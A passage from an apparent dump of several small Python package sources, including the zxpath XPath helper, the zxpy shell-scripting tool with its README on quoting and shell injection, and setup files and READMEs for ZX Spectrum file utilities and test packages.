return _base_library.get_once(node.xpath('./text()'), default)
@staticmethod
def get_attr(node, attr, default=None):
return _base_library.get_once(node.xpath('./@' + attr), default)
@staticmethod
def get_html(node, encoding=None):
bhtml = etree.tostring(node, encoding=encoding)
if encoding:
return bhtml.decode(encoding)
return bhtml.decode()
# endregion
# region 高级查询
@staticmethod
def _parser_attr(**attrs):
if len(attrs) == 0:
return ''
fmt = '[{}]'
attr_fmt_all = '@{}'
attr_fmt = '@{}="{}"'
not_fmt = 'not({})'
text_fmt = 'text()="{}"'
search_attrs = [] # 查询属性
not_attrs = [] # 排除属性
for key, value in attrs.items():
if value is None: # 排除无效属性值
continue
# 判断是否为排除属性
_not = False
if value is False:
_not = True
# 去除前端下划线,并标记为排除
if key[0] == '_':
_not = True
key = key[1:]
# 去除class_尾部下划线
if key == 'class_':
key = 'class'
# 将key:value转换为xpath查询格式
if value is True or value is False:
attr_text = 'text()' if key == 'text' else attr_fmt_all.format(key)
else:
attr_text = text_fmt.format(value) if key == 'text' else attr_fmt.format(key, value)
search_attrs.append(attr_text) if not _not else not_attrs.append(attr_text)
# 检查排除属性
if not_attrs:
not_attrs = ' or '.join(not_attrs)
not_attrs = not_fmt.format(not_attrs)
search_attrs.append(not_attrs)
# 连接属性
search_attrs = ' and '.join(search_attrs)
if search_attrs:
return fmt.format(search_attrs)
return ''
@staticmethod
def find(node, name=None, class_=None, text=None, deep=True, **attrs):
'''
查询节点
:param node: 原始节点
:param name: 元素名, 如果不是str类型则查找所有元素
:param class_: class属性
:param text: 文本值
:param deep: 深度查询孙节点
:param attrs: 属性名前加下划线_会排除这个属性, 如_id=True在xpath中表现为 not(@id)
属性值为True, 表示这个属性匹配任意值
:return: 成功返回etree._Element节点, 失败返回None
'''
result = _base_library._find(node, once=True, name=name, class_=class_, text=text, deep=deep, **attrs)
return _base_library.get_once(result)
@staticmethod
def find_all(node, name=None, class_=None, text=None, deep=True, **attrs):
'''查询多个节点,使用方法同find,返回一个列表,查询失败返回空列表'''
return _base_library._find(node, once=False, name=name, class_=class_, text=text, deep=deep, **attrs)
@staticmethod
def _find(node, once=False, name=None, class_=None, text=None, deep=True, **attrs):
fmt = '{deep}{name}{attr_text}'
deep = './/' if deep else './'
name = name if isinstance(name, str) else '*'
attr_text = _base_library._parser_attr(class_=class_, text=text, **attrs)
code = fmt.format(deep=deep, name=name, attr_text=attr_text)
if once:
code = '{}[1]'.format(code)
return node.xpath(code)
# endregion
# region 节点树
@staticmethod
def find_pre(node):
# 返回当前节点前面的所有同级元素节点
return node.xpath('preceding-sibling::*')
@staticmethod
def find_pre_text(node):
# 返回当前节点前面的所有同级文本节点
return node.xpath('preceding-sibling::text()')
@staticmethod
def find_pre_all(node):
# 返回当前节点前面的所有同级节点
return node.xpath('preceding-sibling::node()')
@staticmethod
def find_pre_one(node):
return _base_library.get_once(node.xpath('preceding-sibling::node()[1]'))
@staticmethod
def find_next(node):
# 返回当前节点后面的所有同级元素节点
return node.xpath('following-sibling::*')
@staticmethod
def find_next_text(node):
# 返回当前节点后面的所有同级文本节点
return node.xpath('following-sibling::text()')
@staticmethod
def find_next_all(node):
# 返回当前节点后面的所有同级节点
return node.xpath('following-sibling::node()')
@staticmethod
def find_next_one(node):
return _base_library.get_once(node.xpath('following-sibling::node()[1]'))
@staticmethod
def find_child(node):
# 返回当前节点的所有子元素节点
return node.xpath('child::*')
@staticmethod
def find_child_text(node):
# 返回当前节点的所有子文本节点
return node.xpath('child::text()')
@staticmethod
def find_child_all(node):
# 返回当前节点的所有子节点
return node.xpath('child::node()')
@staticmethod
def find_parent(node):
return _base_library.get_once(node.xpath('parent::*'))
@staticmethod
def find_ancestor(node):
return node.xpath('ancestor::*')
# endregion
class _Element_List(list):
@property
def empty(self):
return len(self) == 0
def is_empty(self):
return len(self) == 0
@property
def string(self):
return self.get_string()
@property
def text(self):
return self.get_text()
@property
def string_list(self):
return self.get_string()
@property
def text_list(self):
return self.get_text()
def get_string(self, join_str='\t', strip=True):
return join_str.join(self.get_string_list(strip))
def get_text(self, join_str='\t', strip=True):
return join_str.join(self.get_text_list(strip))
def get_string_list(self, strip=True):
if not strip:
return [node.string for node in self if node.string]
values = []
for node in self:
text = node.string.strip()
if text:
values.append(text)
return values
def get_text_list(self, strip=True):
if not strip:
return [node.text for node in self if node.text]
values = []
for node in self:
text = node.text.strip()
if text:
values.append(text)
return values
class _Element():
def __init__(self, src):
self.name = 'comment' if _base_library.is_comment(src) else src.tag.lower()
self.base = src
self._string = None
self._text = None
self._attrs = None
# region 原始xpath代码查询
def xpath_once(self, code):
result = _base_library.xpath_once(self.base, code=code)
return self._build_Element(result)
def xpath_all(self, code):
result = _base_library.xpath_all(self.base, code=code)
return self._build_Element(result)
# endregion
# region 查询函数
def find(self, name=None, class_=None, text=None, deep=True, **attrs):
result = _base_library.find(self.base, name=name, class_=class_, text=text, deep=deep,
**attrs)
return self._build_Element(result)
def find_all(self, name=None, class_=None, text=None, deep=True, **attrs):
result = _base_library.find_all(self.base, name=name, class_=class_, text=text, deep=deep,
**attrs)
return self._build_Element(result)
# endregion
# region 判断
@property
def is_element(self):
return True
@property
def is_node_element(self):
return True
@property
def is_text_element(self):
return False
@property
def is_comment(self):
return _base_library.is_comment(self.base)
# endregion
# region 转换-获取函数
@property
def string(self):
# 返回此节点下所有的文本的组合
return self.get_string()
@property
def text(self):
# 返回此节点下文本
return self.get_text()
@property
def html(self):
return self.get_html()
def get_string(self):
if self._string is None:
result = _base_library.to_string(self.base)
self._string = self._build_Element(result)
return self._string
def get_text(self):
if self._text is None:
result = _base_library.get_text(self.base, '')
self._text = self._build_Element(result)
return self._text
def get_html(self, encoding='utf8'):
return _base_library.get_html(self.base, encoding)
def get_attr(self, attr, default=None):
# result = simple_xpath.get_attr(self.base, attr, default)
# return self._build_Element(result)
return self.attrs.get(attr, default)
@property
def attrs(self):
if self._attrs is None:
self._attrs = dict(self.base.attrib)
return self._attrs
# endregion
def remove_self(self):
_base_library.find_parent(self.base).remove(self.base)
self._string = None
self._text = None
def remove(self, element):
assert isinstance(element, _Element), '只能删除sharp_xpath._Element对象'
self.base.remove(element.base)
self._string = None
self._text = None
# region 节点树
@property
def previous_siblings(self):
result = _base_library.find_pre(self.base)
return self._build_Element(result)
@property
def previous_siblings_all(self):
result = _base_library.find_pre_all(self.base)
return self._build_Element(result)
@property
def previous_siblings_text(self):
result = _base_library.find_pre_text(self.base)
return self._build_Element(result)
@property
def previous_siblings_one(self):
result = _base_library.find_pre_one(self.base)
return self._build_Element(result)
@property
def next_siblings(self):
result = _base_library.find_next(self.base)
return self._build_Element(result)
@property
def next_siblings_all(self):
result = _base_library.find_next_all(self.base)
return self._build_Element(result)
@property
def next_siblings_text(self):
result = _base_library.find_next_text(self.base)
return self._build_Element(result)
@property
def next_siblings_one(self):
result = _base_library.find_next_one(self.base)
return self._build_Element(result)
@property
def childs(self):
result = _base_library.find_child(self.base)
return self._build_Element(result)
@property
def childs_all(self):
result = _base_library.find_child_all(self.base)
return self._build_Element(result)
@property
def childs_text(self):
result = _base_library.find_child_text(self.base)
return self._build_Element(result)
@property
def parent(self):
result = _base_library.find_parent(self.base)
return self._build_Element(result)
@property
def ancestor(self):
result = _base_library.find_ancestor(self.base)
return self._build_Element(result)
# endregion
def __call__(self, *args, **kwargs):
return self.find_all(*args, **kwargs)
def _build_Element(self, node):
if isinstance(node, list):
return _Element_List([self._build_Element(n) for n in node])
if not node is None:
if isinstance(node, str):
return _TextElement(node)
return _Element(node)
def __getattr__(self, name):
# 让这个对象能使用 obj.xxx 来获取属性或搜索一个节点
if name not in self.__dict__:
result = self.get_attr(name, default=None)
if result is None:
result = self.find(name, deep=True)
self.__dict__[name] = result
return self.__dict__[name]
def __getitem__(self, name):
# 让这个对象能使用 obj['xxx'] 来获取属性
return self.attrs[name]
class _TextElement(str):
def __init__(self, value=''):
self.base = value
self.name = 'text'
super().__init__()
@property
def string(self):
return self
@property
def text(self):
return self
@property
def is_element(self):
return _base_library.is_element(self.base)
@property
def is_node_element(self):
return False
@property
def is_text_element(self):
return _base_library.is_text_element(self.base)
@property
def is_comment(self):
return False
def get_string(self):
return self
def get_text(self):
return self
def __getattr__(self, name):
return None
def __deepcopy__(self, memodict=None):
return self
class Element(_Element):
def __init__(self, src):
if not _base_library.is_element(src):
assert isinstance(src, str) and src, '只能传入etree对象或一个html结构的str类型, 你传入的是{}'.format(type(src))
src = _base_library.to_etree(src)
super().__init__(src)
def load(src):
return Element(src)
|
zxpath
|
/zxpath-1.0.3.tar.gz/zxpath-1.0.3/zxpath.py
|
zxpath.py
|
# 操作更方便的xpath
### 使用方法类似于Beautiful Soup4, 但是比他更快速
```
import zxpath
zx = zxpath.load('etree对象或者html源码') #加载
find() #查询一个节点, 失败返回None
zx.find('div', class_='content') #参考 .//div[@class="content"][1]
zx.find('div', class_=False) #参考 .//div[not(@class)][1]
zx.find('div', _class_='content') #参考 .//div[not(@class="content")][1]
zx.find('div', class=True, sun_node=False) #参考 ./div[@class][1] sun_node表示是否递归查询孙级节点
find_all() # 查询多个节点, 参数同find, 返回一个列表, 失败返回空列表
zx(*attr, **kw) #同find_all
```
> #_Element对象
> node = zx.find('div')
>
> node.id #获取id属性
> node.text #获取文本
> node.string #获取整个div的所有文本
> node.a #获取在这个节点下搜索到的第一个a元素节点
> node.html #获取这个节点的html源码
> node.find
> node.find_all
> node(*attr, **kw) #同find_all
> node.xpath_one #使用原始xpath代码查询一个节点
> node.xpath_all #使用原始xpath代码查询多个节点
更新日志:
> 1.0.3
> 移除节点后会重置string和text数据
> find参数sun_node改为deep
> 1.0.2
> 新增:
> _Element_List 所有Element对象查询的多个结果都改为_Element_List
> 1.0.1
> 修复了一些bug, 该bug曾导致:
> 在查找上一个同级节点时会忽略掉同级的文本节点
> 在查找下一个同级节点时会忽略掉同级的文本节点
- - -
本项目仅供所有人学习交流使用,禁止用于商业用途
|
zxpath
|
/zxpath-1.0.3.tar.gz/zxpath-1.0.3/README.md
|
README.md
|
#!/usr/bin/env python
# coding=utf-8
from setuptools import setup, find_packages
setup(
name='zxpath',
version='1.0.3',
py_modules=['zxpath'],
author='zlyuan',
author_email='1277260932@qq.com',
packages=find_packages(),
description='操作更方便的xpath, 使用方法类似于Beautiful Soup4, 但是比他更快速',
# long_description=open('README.md','r',encoding='utf8').read(), # 项目介绍
url='https://pypi.org/',
license='GNU GENERAL PUBLIC LICENSE',
platforms=['all'],
scripts=[], # 额外的文件
install_requires=['lxml'], # 依赖库
classifiers=[
"Environment :: Web Environment",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
]
)
|
zxpath
|
/zxpath-1.0.3.tar.gz/zxpath-1.0.3/setup.py
|
setup.py
|
"""
zxpy: Shell scripts made simple
To run script(s):
zxpy script.py
To start a REPL:
zxpy
If you haven't installed zxpy globally, you can run it by doing:
path/to/python -m zx [...]
zxpy files can also be executed directly on a POSIX system by adding
the shebang:
#! /use/bin/env zxpy
...to the top of your file, and executing it directly like a shell
script. Note that this requires you to have zxpy installed globally.
"""
from __future__ import annotations
import argparse
import ast
import code
import codecs
import contextlib
import inspect
import pipes
import re
import shlex
import subprocess
import sys
import traceback
from typing import Any, Generator, IO, Optional
UTF8Decoder = codecs.getincrementaldecoder("utf8")
class ZxpyArgs(argparse.Namespace):
interactive: Optional[bool]
filename: str
def cli() -> None:
"""
Simple CLI interface.
To run script(s):
zxpy script.py
To start a REPL:
zxpy
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'-i',
'--interactive',
action='store_true',
help='Run in interactive mode',
)
parser.add_argument('filename', help='Name of file to run', nargs='?')
# Everything passed after a `--` is arguments to be used by the script itself.
script_args = ['/bin/sh']
try:
separator_index = sys.argv.index('--')
script_args.extend(sys.argv[separator_index + 1 :])
# Remove everything after `--` so that argparse passes
sys.argv = sys.argv[:separator_index]
except ValueError:
# `--` not present in command, so no extra script args
pass
args = parser.parse_args(namespace=ZxpyArgs())
# Once arg parsing is done, replace argv with script args
sys.argv = script_args
if args.filename is None:
setup_zxpy_repl()
return
with open(args.filename) as file:
module = ast.parse(file.read())
globals_dict: dict[str, Any] = {}
try:
run_zxpy(args.filename, module, globals_dict)
except Exception:
# Only catch the exception in interactive mode
if not args.interactive:
raise
traceback.print_exc()
if args.interactive:
globals().update(globals_dict)
install()
def is_inside_single_quotes(string: str, index: int) -> bool:
"""Returns True if the given index is inside single quotes in a shell command."""
quote_index = string.find("'")
if quote_index == -1:
# No single quotes
return False
if index < quote_index:
# We're before the start of the single quotes
return False
double_quote_index = string.find('"')
if double_quote_index >= 0 and double_quote_index < quote_index:
next_double_quote = string.find('"', double_quote_index + 1)
if next_double_quote == -1:
# Double quote opened but never closed
return False
# Single quotes didn't start and we passed the index
if next_double_quote >= index:
return False
# Ignore all single quotes inside double quotes.
index -= next_double_quote + 1
rest = string[next_double_quote + 1 :]
return is_inside_single_quotes(rest, index)
next_quote = string.find("'", quote_index + 1)
if next_quote >= index:
# We're inside single quotes
return True
index -= next_quote + 1
rest = string[next_quote + 1 :]
return is_inside_single_quotes(rest, index)
@contextlib.contextmanager
def create_shell_process(command: str) -> Generator[IO[bytes], None, None]:
"""Creates a shell process, yielding its stdout to read data from."""
# shell argument support, i.e. $0, $1 etc.
dollar_indices = [index for index, char in enumerate(command) if char == '$']
for dollar_index in reversed(dollar_indices):
if (
dollar_index >= 0
and dollar_index + 1 < len(command)
and command[dollar_index + 1].isdigit()
and not is_inside_single_quotes(command, dollar_index)
):
end_index = dollar_index + 1
while end_index + 1 < len(command) and command[end_index + 1].isdigit():
end_index += 1
number = int(command[dollar_index + 1 : end_index + 1])
# Get argument number from sys.argv
if number < len(sys.argv):
replacement = sys.argv[number]
else:
replacement = ""
command = command[:dollar_index] + replacement + command[end_index + 1 :]
process = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True,
)
assert process.stdout is not None
yield process.stdout
process.wait()
process.stdout.close()
if process.returncode != 0:
raise ChildProcessError(process.returncode)
def run_shell(command: str) -> str:
"""This is indirectly run when doing ~'...'"""
with create_shell_process(command) as stdout:
output = stdout.read().decode()
return output
def run_shell_print(command: str) -> None:
"""Version of `run_shell` that prints out the response instead of returning a string."""
with create_shell_process(command) as stdout:
decoder = UTF8Decoder()
with open(stdout.fileno(), 'rb', closefd=False) as buff:
for text in iter(buff.read1, b""):
print(decoder.decode(text), end="")
print(decoder.decode(b"", final=True), end="")
def run_shell_alternate(command: str) -> tuple[str, str, int]:
"""Like run_shell but returns 3 values: stdout, stderr and return code"""
process = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
stdout_text, stderr_text = process.communicate()
assert process.stdout is not None
assert process.stderr is not None
assert process.returncode is not None
return (
stdout_text.decode(),
stderr_text.decode(),
process.returncode,
)
def run_zxpy(
filename: str,
module: ast.Module,
globals_dict: dict[str, Any] | None = None,
) -> None:
"""Runs zxpy on a given file"""
patch_shell_commands(module)
code = compile(module, filename, mode="exec")
if globals_dict is None:
globals_dict = {}
globals_dict.update(
{
"__name__": "__main__",
"$run_shell": run_shell,
"$run_shell_alternate": run_shell_alternate,
"$run_shell_print": run_shell_print,
"$shlex_quote": shlex.quote,
}
)
exec(code, globals_dict)
def patch_shell_commands(module: ast.Module | ast.Interactive) -> None:
"""Patches the ast module to add zxpy functionality"""
shell_runner = ShellRunner()
shell_runner.visit(module)
ast.fix_missing_locations(module)
def quote_fstring_args(fstring: ast.JoinedStr) -> None:
for index, node in enumerate(fstring.values):
if isinstance(node, ast.FormattedValue):
# If it's marked as a raw shell string, then don't escape
if (
isinstance(node.format_spec, ast.JoinedStr)
and len(node.format_spec.values) == 1
and (
isinstance(node.format_spec.values[0], ast.Str)
and node.format_spec.values[0].s == "raw"
or isinstance(node.format_spec.values[0], ast.Constant)
and node.format_spec.values[0].value == "raw"
)
):
node.format_spec = None
continue
fstring.values[index] = ast.Call(
func=ast.Name(id="$shlex_quote", ctx=ast.Load()),
args=[node],
keywords=[],
)
class ShellRunner(ast.NodeTransformer):
"""Replaces the ~'...' syntax with run_shell(...)"""
@staticmethod
def modify_expr(
expr: ast.expr,
return_stderr_and_returncode: bool = False,
print_it: bool = False,
) -> ast.expr:
if (
isinstance(expr, ast.UnaryOp)
and isinstance(expr.op, ast.Invert)
and isinstance(expr.operand, (ast.Str, ast.JoinedStr))
):
if isinstance(expr.operand, ast.JoinedStr):
quote_fstring_args(expr.operand)
function_name = (
"$run_shell_alternate"
if return_stderr_and_returncode
else "$run_shell_print"
if print_it
else "$run_shell"
)
return ast.Call(
func=ast.Name(id=function_name, ctx=ast.Load()),
args=[expr.operand],
keywords=[],
)
return expr
def visit_Expr(self, expr: ast.Expr) -> ast.Expr:
expr.value = self.modify_expr(expr.value, print_it=True)
super().generic_visit(expr)
return expr
def visit_Assign(self, assign: ast.Assign) -> ast.Assign:
# If there's more than one target on the left, assume 3-tuple
multiple_targets = isinstance(assign.targets[0], (ast.List, ast.Tuple))
assign.value = self.modify_expr(
assign.value,
return_stderr_and_returncode=multiple_targets,
)
super().generic_visit(assign)
return assign
def visit_Call(self, call: ast.Call) -> ast.Call:
for index, arg in enumerate(call.args):
call.args[index] = self.modify_expr(arg)
super().generic_visit(call)
return call
def visit_Attribute(self, attr: ast.Attribute) -> ast.Attribute:
attr.value = self.modify_expr(attr.value)
super().generic_visit(attr)
return attr
def setup_zxpy_repl() -> None:
"""Sets up a zxpy interactive session"""
print("zxpy shell")
print("Python", sys.version)
print()
install()
sys.exit()
class ZxpyConsole(code.InteractiveConsole):
"""Runs zxpy over"""
def runsource(
self,
source: str,
filename: str = "<console>",
symbol: str = "single",
) -> bool:
# First, check if it could be incomplete input, return True if it is.
# This will allow it to keep taking input
with contextlib.suppress(SyntaxError, OverflowError):
if code.compile_command(source) == None:
return True
try:
ast_obj = ast.parse(source, filename, mode=symbol)
assert isinstance(ast_obj, ast.Interactive)
patch_shell_commands(ast_obj)
code_obj = compile(ast_obj, filename, mode=symbol)
except (ValueError, SyntaxError):
# Let the original implementation take care of incomplete input / errors
return super().runsource(source, filename, symbol)
self.runcode(code_obj)
return False
def install() -> None:
"""
Starts an interactive Python shell with zxpy features.
Useful for setting up a zxpy session in an already running REPL.
Simply do:
>>> import zx; zx.install()
and zxpy should be enabled in the REPL.
"""
# Get locals from parent frame
frames = inspect.getouterframes(inspect.currentframe())
if len(frames) > 1:
parent_frame = frames[1]
parent_locals = parent_frame.frame.f_locals
else:
parent_locals = {}
# For tab completion and arrow key support
if sys.platform != "win32":
import readline
readline.parse_and_bind("tab: complete")
zxpy_locals = {
**parent_locals,
"$run_shell": run_shell,
"$run_shell_alternate": run_shell_alternate,
"$run_shell_print": run_shell_print,
"$shlex_quote": shlex.quote,
}
ZxpyConsole(locals=zxpy_locals).interact(banner="", exitmsg="")
if __name__ == "__main__":
cli()
|
zxpy
|
/zxpy-1.6.3.tar.gz/zxpy-1.6.3/zx.py
|
zx.py
|
# zxpy
[](https://pepy.tech/project/zxpy)
[](https://github.com/psf/black)
[](https://github.com/tusharsadhwani/zxpy/actions/workflows/tox.yml)
Shell scripts made simple 🐚
zxpy lets you seamlessly write shell commands inside Python code, to create readable and maintainable shell scripts.
Inspired by Google's [zx](https://github.com/google/zx), but made much simpler and more accessible using Python.
## Rationale
Bash is cool, and it's extremely powerful when paired with linux coreutils and pipes. But apart from that, it's a whole another language to learn, and has a (comparatively) unintuitive syntax for things like conditionals and loops.
`zxpy` aims to supercharge bash by allowing you to write scripts in Python, but with native support for bash commands and pipes.
Let's use it to find all `TODO`s in one of my other projects, and format them into a table:
```python
#! /usr/bin/env zxpy
todo_comments = ~"git grep -n TODO"
for todo in todo_comments.splitlines():
filename, lineno, code = todo.split(':', 2)
*_, comment = code.partition('TODO')
print(f"{filename:40} on line {lineno:4}: {comment.lstrip(': ')}")
```
Running this, we get:
```console
$ ./todo_check.py
README.md on line 154 : move this content somewhere more sensible.
instachat/lib/models/message.dart on line 7 : rename to uuid
instachat/lib/models/update.dart on line 13 : make int
instachat/lib/services/chat_service.dart on line 211 : error handling
server/api/api.go on line 94 : move these to /chat/@:address
server/api/user.go on line 80 : check for errors instead of relying on zero value
```
Writing something like this purely in bash or in Python would be much harder than this. Being able to use linux utilities seamlessly with a readable, general purpose language is what makes this a really powerful tool.
### A larger, practical example
You can find a comparison between a practical-ish script written in bash and
zxpy in [EXAMPLE.md](./EXAMPLE.md)
## Installation <a href="https://pypi.org/project/zxpy"><img src="https://img.shields.io/badge/pypi-zxpy-blue?style=flat"></a>
```console
pip install zxpy
```
### pipx
If you have `pipx` installed, you can try out zxpy without installing it, by running:
```console
pipx run zxpy
```
## Basic Examples
Make a file `script.py` (The name and extension can be anything):
```python
#! /usr/bin/env zxpy
~'echo Hello world!'
file_count = ~'ls -1 | wc -l'
print("file count is:", file_count)
```
And then run it:
```console
$ chmod +x ./script.py
$ ./script.py
Hello world!
file count is: 3
```
> Run `>>> help('zx')` in Python REPL to find out more ways to use zxpy.
A slightly more involved example: [run_all_tests.py](./examples/run_all_tests.py)
```python
#! /usr/bin/env zxpy
test_files = (~"find -name '*_test\.py'").splitlines()
for filename in test_files:
try:
print(f'Running {filename:.<50}', end='')
output = ~f'python {filename}' # variables in your shell commands :D
assert output == ''
print('Test passed!')
except:
print(f'Test failed.')
```
Output:
```bash
$ ./run_all_tests.py
Running ./tests/python_version_test.py....................Test failed.
Running ./tests/platform_test.py..........................Test passed!
Running ./tests/imports_test.py...........................Test passed!
```
More examples are in [EXAMPLE.md](./EXAMPLE.md), and in the [examples folder](./examples).
## `stderr` and return codes
To get `stderr` and return code information out of the shell command, there is an
alternative way of invoking the shell.
To use it, just use **3 variables** on the
left side of your `~'...'` shell string:
```python
stdout, stderr, return_code = ~'echo hi'
print(stdout) # hi
print(return_code) # 0
```
More examples are in the [examples folder](./examples).
## CLI Arguments
When writing a shell script, you often want to pass CLI arguments to it.
Like so:
```console
$ cat ./foo.sh
echo arg is: $1
$ ./foo.sh 123
arg is: 123
```
To do the same in `zxpy`, pass the script arguments after a `--` in the `zxpy` CLI command.
```python
#!/usr/bin/env zxpy
import sys
print("Argv is:", sys.argv)
~"echo output: $1 $2 $3"
```
```console
$ ./test.py
Argv is: ['/bin/sh']
output:
$ ./test.py -- abc def
Argv is: ['/bin/sh', 'abc', 'def']
output: abc def
```
Both `$1` and `sys.argv[1]` will do the same thing.
## Quoting
Take this shell command:
```console
$ uname -a
Linux pop-os 5.11.0 [...] x86_64 GNU/Linux
```
Now take this piece of code:
```pycon
>>> cmd = 'uname -a'
>>> ~f'{cmd}'
/bin/sh: 1: uname -a: not found
```
Why does this not work?
This is because `uname -a` was **quoted** into `'uname -a'`. All values passed
inside f-strings are automatically quoted to avoid [shell injection][1].
To prevent quoting, the `:raw` format_spec can be used:
```pycon
>>> cmd = 'uname -a'
>>> ~f'{cmd:raw}'
Linux pop-os 5.11.0 [...] x86_64 GNU/Linux
```
This _disables_ quoting, and the command is run as-is as provided in the string.
> Note that this shouldn't be used with external data, or this _will_ expose you
> to [shell injection][1].
## Interactive mode
```pycon
$ zxpy
zxpy shell
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0]
>>> ~"ls | grep '\.py'"
__main__.py
setup.py
zx.py
>>>
```
> Also works with `path/to/python -m zx`
It can also be used to start a zxpy session in an already running REPL.
Simply do:
```pycon
>>> import zx; zx.install()
```
and zxpy should be enabled in the existing session.
## Development/Testing
To install from source, clone the repo, and do the following:
```console
$ source ./venv/bin/activate # Always use a virtualenv!
$ pip install -r requirements-dev.txt
Processing ./zxpy
[...]
Successfully installed zxpy-1.X.X
$ pytest # runs tests
```
[1]: https://owasp.org/www-community/attacks/Command_Injection
|
zxpy
|
/zxpy-1.6.3.tar.gz/zxpy-1.6.3/README.md
|
README.md
|
# type: ignore
from setuptools import setup
setup()
|
zxpy
|
/zxpy-1.6.3.tar.gz/zxpy-1.6.3/setup.py
|
setup.py
|
This is the "zxs" package for Python 3.6+
A detailed explanation of the package, along with functions and useage examples, is contained within the Jupyter notebook.
|
zxs
|
/zxs-12.tar.gz/zxs-12/README.txt
|
README.txt
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 30 15:24:18 2018
@author: zxs107020
"""
from setuptools import setup
setup(name = 'zxs',
version = '12',
description = 'A package for data science made easy',
url = 'https://github.com/zxs107020/zxs',
author = 'zxs107020',
author_email = 'zxs107020@gmail.com',
license = 'self',
packages = ['zxs'],
entry_points = {'console_scripts': ['zxs = zxs.__main__:main']},
zip_safe = False)
|
zxs
|
/zxs-12.tar.gz/zxs-12/setup.py
|
setup.py
|
# zxtools
#### 介绍
zx的一个工具集,以Python为主,
#### 安装教程
1. python -m pip install .
2. python -m pip install zxt
3. python -m pip install --upgrade zxt
#### 上传教程
1. 创建 .pypirc 文件
type NUL > %UserProfile%\.pypirc
2. pypirc 规范
https://packaging.python.org/specifications/pypirc/
3. 升级工具
python -m pip install --upgrade build
python -m pip install --upgrade twine
4. Generating distribution archives (生成档案)
https://packaging.python.org/en/latest/tutorials/packaging-projects/
切换到 pyproject.toml 的同级目录, 一般先删除 dist 目录(RMDIR /S .\dist\ /Q)
python -m build
5. Uploading the distribution archives (上传档案)
https://packaging.python.org/en/latest/tutorials/packaging-projects/
python -m twine upload --repository zxt dist/*
#### 调试教程
1. 卸载 zxt 包
python -m pip uninstall zxt
2. 从 zxt 的源码中找到 pth.py 所在目录, 在该目录下执行如下命令:
python ./pth.py --dflt_opt=C
3. 源码已关联到 python 环境, 可以写代码调用 zxt 包进行调试了
|
zxt
|
/zxt-0.20230811.1830.tar.gz/zxt-0.20230811.1830/README.md
|
README.md
|
from setuptools import setup
setup()
|
zxt
|
/zxt-0.20230811.1830.tar.gz/zxt-0.20230811.1830/setup.py
|
setup.py
|
# zxtaputils - Utilities for handling TAP files on the ZX Spectrum (Next)
## Description
This is a collection of small utilities to work with
TAP files
This suite consists of the tools:
- bas2tap: turns BASIC code into a TAP file containing tokenized code
- tap2bas: view/save BASIC code contained in a TAP file
- tapextract: extract and save data from a TAP block
- tapify: store any files inside a TAP file as a container
- tapinfo: view information about a TAP file
- tapsplit: save a TAP file's blocks as individual files
|
zxtaputils
|
/zxtaputils-1.0.0.tar.gz/zxtaputils-1.0.0/README.md
|
README.md
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
INSTALL_REQUIRES = []
setuptools.setup(
name="zxtaputils",
version="1.0.0",
author="Wei-ju Wu",
author_email="weiju.wu@gmail.com",
description="TAP file related utilities for Sinclair ZX Spectrum",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/weiju/zxtaputils",
packages=['zxtaputils'],
install_requires = INSTALL_REQUIRES,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"Intended Audience :: Education",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Topic :: Software Development",
"Topic :: Utilities"
],
keywords=[
"sinclair", "zx", "spectrum", "tap", "development"
],
scripts=['bin/bas2tap', 'bin/tapextract', 'bin/tapify', 'bin/tapinfo', 'bin/tapsplit', 'bin/tap2bas'])
|
zxtaputils
|
/zxtaputils-1.0.0.tar.gz/zxtaputils-1.0.0/setup.py
|
setup.py
|
我的库是一个很好的库,大家可以用它来做很多事情,欢迎大家下载使用!!!
*斜体*
**加粗**
``this is my code``
|
zxtestlib
|
/zxtestlib-1.0.0.tar.gz/zxtestlib-1.0.0/README.rst
|
README.rst
|
import zxtestlib
zxtestlib.zxtest.run()
def tools():
print("this is a func for tools!!")
|
zxtestlib
|
/zxtestlib-1.0.0.tar.gz/zxtestlib-1.0.0/tool.py
|
tool.py
|
from setuptools import setup
def readme_file():
with open("README.rst", encoding="UTF-8") as f:
return f.read()
setup(name="zxtestlib", version="1.0.0", description="This is a test lib", packages=["zxtestlib"],
py_modules=["tool"], author="zx", author_email="870121209@qq.com", long_description=readme_file(),
url="https://gibhut.com/zhongxi/python_code")
|
zxtestlib
|
/zxtestlib-1.0.0.tar.gz/zxtestlib-1.0.0/setup.py
|
setup.py
|
=====================================
Tools to manipulate ZX Spectrum files
=====================================
.. image:: https://img.shields.io/travis/codeatcpp/zxtools/master.svg?style=flat
:target: https://travis-ci.org/codeatcpp/zxtools
.. image:: https://codecov.io/gh/codeatcpp/zxtools/branch/master/graph/badge.svg
:target: https://codecov.io/gh/codeatcpp/zxtools
.. image:: https://img.shields.io/github/release/codeatcpp/zxtools.svg?style=flat
:target: https://github.com/codeatcpp/zxtools/releases
.. image:: https://img.shields.io/pypi/v/zxtools.svg?style=flat
:target: https://pypi.python.org/pypi/zxtools
.. image:: http://img.shields.io/pypi/dm/zxtools.svg?style=flat
:target: https://pypi.python.org/pypi/zxtools
Here's a set of utils to manipulate files that were copied from a TR-DOS diskette or from a tape.
Originally the tools were written to simplify the following workflow:
1. Grab diskette image using `Hobeta <http://speccy.info/Hobeta>`_ tool.
2. Strip the file header and save the result to a new file.
3. Convert resulting `Zeus Z80 assembler <https://en.wikipedia.org/wiki/Zeus_Assembler>`_ file to the plain text format.
TODO: I have future plans to implement some more tools I need to restore my old ZX Spectrum projects.
But you can use them in the way you need. And it's very easy to use: download the package, run ``setup.py`` (or install via ``pip install zxtools``), invoke in the following way::
$ python3 -m zxtools.hobeta strip input.hobeta result.zeus
